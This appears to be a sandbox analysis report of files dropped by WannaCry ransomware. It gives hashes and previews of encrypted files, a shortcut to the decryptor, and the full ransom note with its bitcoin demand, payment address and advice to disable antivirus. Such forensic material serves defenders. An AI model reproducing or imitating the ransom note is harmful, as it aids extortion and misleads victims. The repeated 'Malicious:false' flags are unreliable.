                                                                              SSDEEP:24:bkYZxCbzEy7dZcuRUrYEOOJEEnLqjenF8xvPYHutm0z9cqW+amS:bkokEw5VOJEESeGxvPVncqq
                                                                              MD5:860E8CFE530B200BD2B1098A7A4176EF
                                                                              SHA1:E2559E8C9654CA1DB9C6A5D53C39A5AC896D5F14
                                                                              SHA-256:8FBFFCC862F5D887B4446AAF661E65E1EF64732D2FD9715011DCFF347DB4CB5C
                                                                              SHA-512:AE6CEB789562BCDC5AB1CFBF0137482E6E5DEC78DDAFD763464C2D80DE88553784812F6CA967AEAA9911FAAB79CA4C8FB9015856EB77967FB5DDE2FA40891938
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....fA.K.....%~.K+.?.4!..G.....g..)..[4.?..B......x.d.b..g..U....?c9.{..OQ+..e!...Z....h......*(...7...f..s.xg..E.Et...J.]....v..i.....V.9...."!....P.....Z..';F~..bX....".y....%......(.#...L2(..:.V4...T....t...WVz...(.,..-.H....B..x.....!if.L.1...............mD..2/..:4..>....Sw..4^M...UD...d...........k"lxT.5k.{..OXQT.9..t....j...y....|.n*oKm'.......eW..Uy.5..i...f.5..0u....R7nfOS.S..A.n".|I....l.......\......x...H....[..(E...j,#..H..a%a....SM..".....V.6b.1.......u...Oa.;.ZHk.N.i.#jfmH.%Fn.cY....,d.w.9a...=.....>..y.kX.w.v._|........(..8.@........v'......g>..Kn.....M.1.O...H......;....Y...PI...^..4gZ..2dF,....C...V.......dF...?..e..e.{. ..aKZO^...s..b....z....m\=..f&..#...G.R.H........4...w....T2....nw.fHoM.@u..W[].L.;.H.CcB.Q..._....e$.;nI.....!G./:ix..].L......b..-............<....Cb...p....O...0>.........Y...R).D....7.../p..,.:H..>.5:.W..l..(.kF..F.......&.wP....%*0. *.4[^.=h..5(4.?./B...Q.U.?S..:.s..Pp.|........t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.824419862353599
                                                                              Encrypted:false
                                                                              SSDEEP:24:O/k7fr9YK/Nz5F6wKHi89A7gYyXsNfF9G5OUieHhPYrPrZY:OsfJJilu4s9F9VUiQIrZY
                                                                              MD5:AB421734BC4B5C106F3E26BB6C33A9C0
                                                                              SHA1:701CCA95A19C0BAF8E0732566A4E7346B3501158
                                                                              SHA-256:7ABED9FB7665923BFE026B61A5B77D79BB9754F16A68D948C03D6BF1CEFECEA2
                                                                              SHA-512:378F1786DDD9D2A85CEB6C9D7F4A72ACF57D09E1475CD4143636C1D314F5918BE7B3B745DED4EEE7E652A6A3B4FB056FDD6FEA030160CB6548BA47B59E8A3E60
                                                                              Malicious:false
                                                                              Preview:@.G......=W0.O.d..u......?7.4.U...d=...<V...r...m..J...g...%...A......B.g.a....P..x..@.C..H..G._.g\.W..X..;.^.b;dt.$.......~.Gb.p...(..._8NBh....IV.=~.....>...5z.... ..)..~.....9R4@.P`.-P....MQ0EH.ki....r*l%..=#=tQu...d..G.^Iz...|w.%..kh.h..iR...Q....`...YZE.fz..R-......)&...'.ao..9|.:....._..!..:..q..uO.nC..f..L...]....h.8*.~......fY.n...($..~.K\..h..$.)..y...i... .hv..b.L.U.b.!.(+...N0.&.P.z.....1.~...#...S.C.I.Q.Vp.w.Q..)y.......p... >,...e..]........*vg..e....6............Y.......-zC.v.>F..|../.l}I..>...1.......0.i6......ccz<.xTYt.CW@.E:...^v;.....Y....g......[.b....[(T/.F..r...)..3...U.......=........t..z4.....}{w.....k.-...~D.A(...'..P.(.C......;w...G.T.....S.....=..8.%5;DV(...u.P9.....q...+.*..K+&. ..sA....N.J...e....._$G.D...<d...&..i....[.$l....%x.0@....A.c.\zg..x....B.....6..4.g2....Qv...td..|.%..S4..........o...8......G?<8.b...#....}.6.........@/....m.................v.[.\....Lw..s]..k....d..q`. ..e,..j..F..e..p"X..s..I$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.86666614389731
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7tUJOOUnisAlObpX92kiuZSFuNy8yuxOjh42U6yvCNC2GoEHtmQA1+NtYzf:bk7oUnu4sFuN7Ojh4iyq8kxQ1Nt+
                                                                              MD5:DA5E2E7BCBDB332291EC9477DD583B5E
                                                                              SHA1:855D962777A7EDEBFF18249DDAD88A58FDA33944
                                                                              SHA-256:6C7D3E26DD6FA336313321D618AF3E5922DD5643C7D55204D943F10B20E8BD08
                                                                              SHA-512:FC6C76759D625FD066EF00EE1E9CA560D98FAD81E8DF8957CC40480C8E11179B0093F7B0AC5B1C5E994BFBCFC8A80CFBDA832EE0CA461BA189EFFF81535D9977
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q...........#.....|_.x..;]...7..;.[S.v.kAT.....rz..j..8?..>.f...Hq.1.."6.p@~@.-S..k.%/:.....<0.-..u...B`Z...a...F.'z.=....H90..VU.f~/l..|<Y.$..f[.#..2...Z..G.<.z:dHz.Cx.Wz@l../d[pu......h..q..?....>..@U).....b|.).=...[c.............*r..qD..............3.....I}5j.z.._B....@e.P=....uN........6.Ar...P.....}..p..B~..k..9(&.Fc.t....k.0.p..2.i...K}.v.z[xWI9...1.j6..`U....x..*/G5.M..R....P=.....0A."#.y..].~..&..|35cg...4.F....I.....PU1\.<..z'+.l.f..^..6.s,m......s.@........M.k.....96...>..? ?........o.,..:..o.:...h.....s.B.X.U..{.......II..-...O..0.G.j...w.6..<....-.q.0.....%....F....qZb..s>.m..3..#.58.O.q$.u..z/......f..e!.N.....J..4.".*.q`.....!..1.-.^x:..0......#8|.k..9RB7."...v.p.(P.c.gN*.-x...`...!./.>....z..b...]aH".3.(.gOl......&<...2......%'&r.....e.?.,X..i+D.ZT5....K.m#.b..Q.0M..49.$....].G%...g.f/c.+....6..=8C.-.....1....&..U.*....+C.G.R.C1....$Y.,j.8..:......2....L..o..gs.Y.v.h...I...-..y.S.n..t%.Sc.\.....*...V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.86666614389731
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7tUJOOUnisAlObpX92kiuZSFuNy8yuxOjh42U6yvCNC2GoEHtmQA1+NtYzf:bk7oUnu4sFuN7Ojh4iyq8kxQ1Nt+
                                                                              MD5:DA5E2E7BCBDB332291EC9477DD583B5E
                                                                              SHA1:855D962777A7EDEBFF18249DDAD88A58FDA33944
                                                                              SHA-256:6C7D3E26DD6FA336313321D618AF3E5922DD5643C7D55204D943F10B20E8BD08
                                                                              SHA-512:FC6C76759D625FD066EF00EE1E9CA560D98FAD81E8DF8957CC40480C8E11179B0093F7B0AC5B1C5E994BFBCFC8A80CFBDA832EE0CA461BA189EFFF81535D9977
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q...........#.....|_.x..;]...7..;.[S.v.kAT.....rz..j..8?..>.f...Hq.1.."6.p@~@.-S..k.%/:.....<0.-..u...B`Z...a...F.'z.=....H90..VU.f~/l..|<Y.$..f[.#..2...Z..G.<.z:dHz.Cx.Wz@l../d[pu......h..q..?....>..@U).....b|.).=...[c.............*r..qD..............3.....I}5j.z.._B....@e.P=....uN........6.Ar...P.....}..p..B~..k..9(&.Fc.t....k.0.p..2.i...K}.v.z[xWI9...1.j6..`U....x..*/G5.M..R....P=.....0A."#.y..].~..&..|35cg...4.F....I.....PU1\.<..z'+.l.f..^..6.s,m......s.@........M.k.....96...>..? ?........o.,..:..o.:...h.....s.B.X.U..{.......II..-...O..0.G.j...w.6..<....-.q.0.....%....F....qZb..s>.m..3..#.58.O.q$.u..z/......f..e!.N.....J..4.".*.q`.....!..1.-.^x:..0......#8|.k..9RB7."...v.p.(P.c.gN*.-x...`...!./.>....z..b...]aH".3.(.gOl......&<...2......%'&r.....e.?.,X..i+D.ZT5....K.m#.b..Q.0M..49.$....].G%...g.f/c.+....6..=8C.-.....1....&..U.*....+C.G.R.C1....$Y.,j.8..:......2....L..o..gs.Y.v.h...I...-..y.S.n..t%.Sc.\.....*...V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.799755529702723
                                                                              Encrypted:false
                                                                              SSDEEP:24:BgiwNNNurqxfAaLyV1mVX7s5z31FIej4avKzvjKPCc/7L:BbwTJfAaLYEpyz312ejvv+LKPHv
                                                                              MD5:98D5290EEF6EDCD1C597D19F8FE991D3
                                                                              SHA1:FE069B1CDD98EF13D67BFF4F1A39EACB458D07E1
                                                                              SHA-256:F83DAD483DE8B8C7A3BC10AF0544366FD567C972D72FAF404FB4796DF581E2C3
                                                                              SHA-512:25459B46E1D9ED0693090FA434426DFCE1A009BB12B79F711892465EABC20801057E198158D759E0FC3646B348A4F7E777BD921787A88BD34FAD9E34C7415DD2
                                                                              Malicious:false
                                                                              Preview:.4'...N>u...t.....R.v.4.p..P.P.......D..n.-..#....p,.y.-.>.Z..M..b.79D.uzM......M.>..;7k.O?.G...Q-..g.qe..PtO|.-...y.....f.q../.J;..).d.A..I.....|..n.....W..~.|..)j'.ugj.E.Y_.....X.......Q*...xA@.......:.F.JI..la...$3...+.h...5.....S....M..)Z.._.6..{.\..u.$[...1ET%$..s....$..(p%..'...o.q.z.VLw.M...;.0.D..bk....#L..L..B.b.{..k...vN.....Qw.{.@.`o}..sa...j.....>.z.D~e..,..9.b iyJ@1E....7H.E...>.#%>.i.!..!N.}.a.Lp@...7:..T&U.=~.....ya..A.....T.$.b...."i....T..I...w-...1a...Q.T+.M......:..1.*..~...Lp.B=...a.._.. ...+Th9=X.(..~..WfW..b.......D.Ze......I..8b.....oxO...-3...~.H."..%9....{.Xi....[..k)jF!@*".......=.&MZ..F.bHj.`S......v.i.b...a..b..!p.UX..0ER.[..x....l]iJ.N.6..T.4K.r.c.j..$O.m.9...e.yO.G$_.KU..*=L.1v..R.C.-&.m....3_......S@.+.7\...c.S. 7.M.,~}.......S@wS.+..oE......(....2..&.L)...U0M%Q....C8..W.k.....3...|.f....Pe..ct..K(.;....k..gs..D.U..E...4.M....S.a...n;lX..A...<./.T.....p....Q.S.d......ZU;....w.F..Y.kU.'y..n.(..g....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.825158964880509
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzUmf0nZK0+3JsjKkP9bc4rsonTFYsyKWMiIuMfQwlvnCxZXSD76AII4:bk7f0Yd3JJkPNJlOLM9qxZSD76AII4
                                                                              MD5:0D41A76397579F59D20C437898421564
                                                                              SHA1:15137FC2573577A3F0A31D3AB13C2C414DAAEAEA
                                                                              SHA-256:05AE0FD1710285E103387CB2BCF5C74EBEB0F3B095D0A4A3D5CC3B2085B662F8
                                                                              SHA-512:4AC581A741E9F903A46A9F5046C36363C6C7AE2D531D43550D1366A9C9FAEC6DC8E5E71BAE86FF5FBBD69F49FEF0554E463E6BE6D118ABC4868D18E5F166D835
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....L..Ht..h.r..m..'Y.#.~6W.]...dSqK..{.}....8... .............].a~H:a...W.(z.H.XH..f-1O..C....keU....LU.G.~..$G..:...%y5.P.Z...-h...}.H...7...6....D.0izV!....0~.O.l7.I.p...[k..OL..aF...w.f....dR...m9.p.3y.^W...M..........q.~Gu+.".(.`mFo.G.r.|.....;..7W...............*_..o2....^..T.s.gX.g.c}..U.........[.e......(./.,.u,)..'..s@..lN..7.#.$."..........E..)..<swtK...}...".S.J6P...j.F..S....h... ...}...kGk.+6...?X....Y.f..]..k.{\D.'...-<_K)..)5....+=..7..b....9.l...f......dp..&......3y.P..P.%.w......:oOH`.Q.!....Qb}..rN.v3.!...gG.%.......I.t.b..{.{.O...QS.......6.K.......lSK9....6.#.....\.}.....5..Bf...]......Z.....tw.B.8%...!$}=......r.Qr.~d...M(i.g(.S:...B...MD....U.z..X......j.6....=...w.3|R....Sp...9.u..lD....|.5..*D.!.....[....t:3K..s.....a."..B..{Eh..S1....6.`7.t...V..u_.G.j.,Q{b..p....p.... .B....4.ZM....p.{...,..'....8.g.AS...%.LF.D...ci.Z..:.....w9S.d..7VL}d.I...5.....M.4.....s.5....Y...+.Y..:...L.P..(4.Cs. }.{/a!?........~qF.>p..H..B
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.825158964880509
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzUmf0nZK0+3JsjKkP9bc4rsonTFYsyKWMiIuMfQwlvnCxZXSD76AII4:bk7f0Yd3JJkPNJlOLM9qxZSD76AII4
                                                                              MD5:0D41A76397579F59D20C437898421564
                                                                              SHA1:15137FC2573577A3F0A31D3AB13C2C414DAAEAEA
                                                                              SHA-256:05AE0FD1710285E103387CB2BCF5C74EBEB0F3B095D0A4A3D5CC3B2085B662F8
                                                                              SHA-512:4AC581A741E9F903A46A9F5046C36363C6C7AE2D531D43550D1366A9C9FAEC6DC8E5E71BAE86FF5FBBD69F49FEF0554E463E6BE6D118ABC4868D18E5F166D835
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....L..Ht..h.r..m..'Y.#.~6W.]...dSqK..{.}....8... .............].a~H:a...W.(z.H.XH..f-1O..C....keU....LU.G.~..$G..:...%y5.P.Z...-h...}.H...7...6....D.0izV!....0~.O.l7.I.p...[k..OL..aF...w.f....dR...m9.p.3y.^W...M..........q.~Gu+.".(.`mFo.G.r.|.....;..7W...............*_..o2....^..T.s.gX.g.c}..U.........[.e......(./.,.u,)..'..s@..lN..7.#.$."..........E..)..<swtK...}...".S.J6P...j.F..S....h... ...}...kGk.+6...?X....Y.f..]..k.{\D.'...-<_K)..)5....+=..7..b....9.l...f......dp..&......3y.P..P.%.w......:oOH`.Q.!....Qb}..rN.v3.!...gG.%.......I.t.b..{.{.O...QS.......6.K.......lSK9....6.#.....\.}.....5..Bf...]......Z.....tw.B.8%...!$}=......r.Qr.~d...M(i.g(.S:...B...MD....U.z..X......j.6....=...w.3|R....Sp...9.u..lD....|.5..*D.!.....[....t:3K..s.....a."..B..{Eh..S1....6.`7.t...V..u_.G.j.,Q{b..p....p.... .B....4.ZM....p.{...,..'....8.g.AS...%.LF.D...ci.Z..:.....w9S.d..7VL}d.I...5.....M.4.....s.5....Y...+.Y..:...L.P..(4.Cs. }.{/a!?........~qF.>p..H..B
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.818596226590152
                                                                              Encrypted:false
                                                                              SSDEEP:24:4LOkW54GlCg2Hh8DTq1LfhaWNItIDR6fWOokoFjo8ESegsAvZpFSS:Rks4Pg2BLfhkeCWOJoW8ESLDvZrSS
                                                                              MD5:C7210D95187C19ADD9AC46A483745640
                                                                              SHA1:24BC61636C3C1704E7C97F907C2C98A627D0D928
                                                                              SHA-256:BF43BD4A193DDCC6AE855E3B3A84C45EC6D879F23058CE88D49115A86DFEF4A7
                                                                              SHA-512:664C093FDE5EBEF834204AC2D35A3559FC13083E38D5C41596C72306D95D1D418BA431ECEC26E55700340682950116DF16A26BF5CBAB2D05453E2540718C7231
                                                                              Malicious:false
                                                                              Preview:.h.x......=...k...2.9.di@.J>v....X..ghuH.}.0MF.^9e~...n..s...d.....e}f8..M...y .1.E..6...oh1W.!.....%..._>..N_..U...8.l4<.u...}o..8Jr.,..:e..E5.a....L.BX..[..l..p.)h...$EM..k...q4..'1..".....M3.6l.{......A.(&.....b.......K...!.B..3D.y........}U.U.^UP."..+....bv.T..&.b.1.#.OP.'......c.7..b..a..s~.............ztr....Qk...7.O...1.*|H...e.;..;...tv' ..."?I......'..e.u..O^E...;.HbQ...F.JQ...d.."`Q.q...)..D."..WB.;J[...h..G0k/....$:..M....2........r....$.NN.D"...*gwv.a.X..S...=..Z.B.."I$k.9..~..e......F*./U.J......A...'.5..9...S.[.....&.v@Rb.|(......j....i=..(pe.-{.s.W......x. ....P..t.,..>.c..7,....P.O..Y.."..-g.(g.z.......6;c...w^.b.....w.C...O......nOS..}[U..Z0>.+.#u'v....3.zS.0['..r.ph...+..+..X.o..e..H.{..rF..........L.z.b.q...S........0N.;..v.FwdQ.....H.a....92:...2..\.Y..N./.1cL....=..$..o.S{..[mb..j......C....JF.)Zs.7i..%.dS.,..)..;.J..G...pd..C}f.{....X>7.U.c...Q..H |.;.....7 .U.*.z...fS.........: j]..%.S.L....H.-..g.4y.]{O.x...'<c
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845735965327685
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+wEEhv5n1GBRPFVhZ8ysLObRceEn7qkoZeOITCJHmruMpn685INVkkMiL/:bkWsvR1Gb8HyR/EnLoZ4TCNmruVEINvR
                                                                              MD5:96EB03212522014C02BEF82CFF4CD890
                                                                              SHA1:1DD7F69988FDDC5AE5373A3590D9AF608F7E5EBA
                                                                              SHA-256:07074B99D0B0E50FF380E1065A7657888B45A3092515D6CBF9DEAC83EC5D5C1C
                                                                              SHA-512:77AF6BCA9E45A552C0C85776F7E0BBBBE3188D1F080BEDDF0DC29B1885648C02236D0D43E25C62FEC160AB46B1A34F1417D9B9F78DB9B44167DA975991895629
                                                                              Malicious:false
                                                                              Preview:WANACRY!...."..`........RZ.5~.Kn.z...U..qH...NGJ...g.x..LU!/. ^.;i.`....H.......?....+b.d.../E......V....XT....M*....._..|..6...Ri;...W..;..V..<k.H..u.E....~........#......3.{.J2IQ...~.(.Z....:q...I.c...9..p I. ."sH....8.?o.....EYL....;.@>>.w\..M......eXf'w............N..A...Z._.XloT^....h.j.h.|.f$...HM}.0i..DC..Ik:.....=.*.+Sh.y....KH....(.Yr.%..wg.J..wu...8.Z.*a.c|.[q.|4..G............{Y..]..~g:....~.r.+..E.W..'..%bv.^A.c.....-.E.|...u..s.).....Fj..;.....<.....M..z......|..J(.sC.HF.Q;...o..."..G..^\.o....]2.P..qY$.........M..9...rAa.p..|.P.c....&......N^BSe.,..PyA...k.......*..m.`...v......%..9X.b.f....81C..s.d...l...tJ..cSU..M....H.......,.dR3.....moM..D.....5..t.T....Q.Oo..Eg..dPX."q.`...u..Y.I..@....2.Y.H:..Oc`O..8.8..a,..b+.;ePi....w....s.~......}.m...8..E..Q......8{*.............#P*vB..c.%....%.].U...D......a...=....M1BHNAi..~[.P|+.h%....y....[....BmxU..O..... .O..;.6i|0..((+X...$...W....).x./0.....[.Z.,...~(v.o.y.#,..|F_..{zw'..g.#
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845735965327685
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+wEEhv5n1GBRPFVhZ8ysLObRceEn7qkoZeOITCJHmruMpn685INVkkMiL/:bkWsvR1Gb8HyR/EnLoZ4TCNmruVEINvR
                                                                              MD5:96EB03212522014C02BEF82CFF4CD890
                                                                              SHA1:1DD7F69988FDDC5AE5373A3590D9AF608F7E5EBA
                                                                              SHA-256:07074B99D0B0E50FF380E1065A7657888B45A3092515D6CBF9DEAC83EC5D5C1C
                                                                              SHA-512:77AF6BCA9E45A552C0C85776F7E0BBBBE3188D1F080BEDDF0DC29B1885648C02236D0D43E25C62FEC160AB46B1A34F1417D9B9F78DB9B44167DA975991895629
                                                                              Malicious:false
                                                                              Preview:WANACRY!...."..`........RZ.5~.Kn.z...U..qH...NGJ...g.x..LU!/. ^.;i.`....H.......?....+b.d.../E......V....XT....M*....._..|..6...Ri;...W..;..V..<k.H..u.E....~........#......3.{.J2IQ...~.(.Z....:q...I.c...9..p I. ."sH....8.?o.....EYL....;.@>>.w\..M......eXf'w............N..A...Z._.XloT^....h.j.h.|.f$...HM}.0i..DC..Ik:.....=.*.+Sh.y....KH....(.Yr.%..wg.J..wu...8.Z.*a.c|.[q.|4..G............{Y..]..~g:....~.r.+..E.W..'..%bv.^A.c.....-.E.|...u..s.).....Fj..;.....<.....M..z......|..J(.sC.HF.Q;...o..."..G..^\.o....]2.P..qY$.........M..9...rAa.p..|.P.c....&......N^BSe.,..PyA...k.......*..m.`...v......%..9X.b.f....81C..s.d...l...tJ..cSU..M....H.......,.dR3.....moM..D.....5..t.T....Q.Oo..Eg..dPX."q.`...u..Y.I..@....2.Y.H:..Oc`O..8.8..a,..b+.;ePi....w....s.~......}.m...8..E..Q......8{*.............#P*vB..c.%....%.].U...D......a...=....M1BHNAi..~[.P|+.h%....y....[....BmxU..O..... .O..;.6i|0..((+X...$...W....).x./0.....[.Z.,...~(v.o.y.#,..|F_..{zw'..g.#
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7759027048250555
                                                                              Encrypted:false
                                                                              SSDEEP:24:YZ503Q2G4vOvs96w6qb3v+wq5dLboEDThdTsNyds8Jir1Rj:YZodGvv033vjc9hdT0uiDj
                                                                              MD5:7816BEE329236D420E320655346ECA1B
                                                                              SHA1:FCD2A486D7EDEF53D1FFD970C5B02FB75A03A6D8
                                                                              SHA-256:DFA0372564E07F9F9FFB33C261780D98E56C71BC07BD9632730088FB13AC0741
                                                                              SHA-512:3498EBBBCDF372BD52E1805FB78B2B55F8D5526CF9BFA9B478E669765E3499BEDE0E34AEE0D1207E60AEB348D8D49D21CEED6896DCE5AC9806F0EA092421C9E3
                                                                              Malicious:false
                                                                              Preview:.c.m.v...d.......(...1....L.l..$%.Qz.k.x0o.S'.fx...u..E..-..%Hm.....H....}Wo.-&..1..Q...k'.d.3...p..e.z......"..4.rn.'%..."^x3.<..}...`.}..........8h.G.....}(..2.7|..C..'..9..y.....5..\..y.+.b.$.!..f.4.x..C.L.v.W....?.i...0.d.....2..-J...[.....O..T_(7u.b- .o.......w~.DH0...z...[4...:K...|.8....e..v....A....Od_:U7.ed..s.f.n.}.9....].......0.X.$:..........6.h...a.1.7...-.P5.ej|....$.AK-.*..o...[....N.V<.Y.I......!a..-..K......&...S.E.cN.z/..."i.}...b...-...<*ua......p..<m.$....qm..|....L...c$.v.J<..+.z.^X....e'..d.s..':hx.4%i.[..2...%4|../..1..+..O...Z...4".d...\B..6^%..L..F...s.D.h....G1..7..I.z:E....O.@9^.|.b..;.WKt2...;..q..<N..R*vMN.2...WS_..Ddg....W.,D.Ks,.-FYA....#4.!........a.Ex.z!..B..a....dz.sO.2+3.v.]...0...~n]....Y~...O..g'..L...4.<?u...{W.....m....$?g...#U:.W.......4.;...x.lZ1.I|..[.3.I..,.......e......~^>#....d.8dVu`.x..|..0........O.Z1.H5>.?.......X....F).<K^..u.:..X..X.V.K.WJE_.,w<I<Y.8.........t...T.+....e..wv..T(..|.F!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83202070254826
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1nPwswALZ1e3GXTqWN1LEG16Cwuhu3xiXKSXG1a5JAuG5L8zsrb:bk1nFwUZ1NTDSCwsXxdvEL8zsf
                                                                              MD5:B7A575580096E9DF002F183539F639F4
                                                                              SHA1:7E85BE7D3DBAB18B8F3A00349B44FB4EADAEAFE9
                                                                              SHA-256:60B8B154E34CD7774CFEDD05AED1A6B95ADC471336C47CDA05ADB1984C5EAC79
                                                                              SHA-512:D0AF4BB262DABBECED93B019E883EEAA07FF43DCE91EE3BC890CBA921FA688706E0572A48EC1CC7FFA2B8A72E9C89A4217B23DAB0AC74225E8274CA7806A65E8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Jo.w..s.D6?$.3.........O,.S.:...U..X..yg..C..1kW...*[.......!h:.................1U.`..a..SUa.$.P1.%.8.....?....M...IY..K.~...NA.M.Q...S......!..E...Q..@..A...K...^k.o?..L.{T...LfzDH81.[!.`.8....@....Sc.,r+.8.....1.4..&.A.....">."e.w ..60.1..............L.u..1.4..N.I.Z..)uW.-b'.~....h.c./Gki.9...5.@.{.5f....t.......l.~.Uo..$...t....0Z.?..B.G./n.Y.d6...L.>]...e$...T9.X./>R..t]...7<........{.in....:mf...i..........h.f#..m....1....}g.f.....iI.%'.(.@j..^...i_d.`q..V...:.r.....v.).~$..O.....z.a0.....?..4.|.....C..y......._.Hb.@R.N.....b..4...W..r...As\..3.wP...h.Z......@....4.,....<.ss..@P.. x>...l....{M.{"....Tt].......E.@.`..........^9...@.$..u{..H..S.....|k......[...S...E..n......Y.:.A;..'?...9.'....X.r.0........k.Z.....p.....mEm.qf'..@1v.K..^M..a...K.[.-b.-..vm.DV.+..8..a..<._G..FY...X..T.."..7...Fu..G.U3t.....@.^9r..8...\.>..V..Tm.%.^.T8.t....5.i.D.5'X....R.a6....U.5A..'...#....T.(....5.1..;....z...km........x.W..a[.aA......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83202070254826
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1nPwswALZ1e3GXTqWN1LEG16Cwuhu3xiXKSXG1a5JAuG5L8zsrb:bk1nFwUZ1NTDSCwsXxdvEL8zsf
                                                                              MD5:B7A575580096E9DF002F183539F639F4
                                                                              SHA1:7E85BE7D3DBAB18B8F3A00349B44FB4EADAEAFE9
                                                                              SHA-256:60B8B154E34CD7774CFEDD05AED1A6B95ADC471336C47CDA05ADB1984C5EAC79
                                                                              SHA-512:D0AF4BB262DABBECED93B019E883EEAA07FF43DCE91EE3BC890CBA921FA688706E0572A48EC1CC7FFA2B8A72E9C89A4217B23DAB0AC74225E8274CA7806A65E8
                                                                              Malicious:false
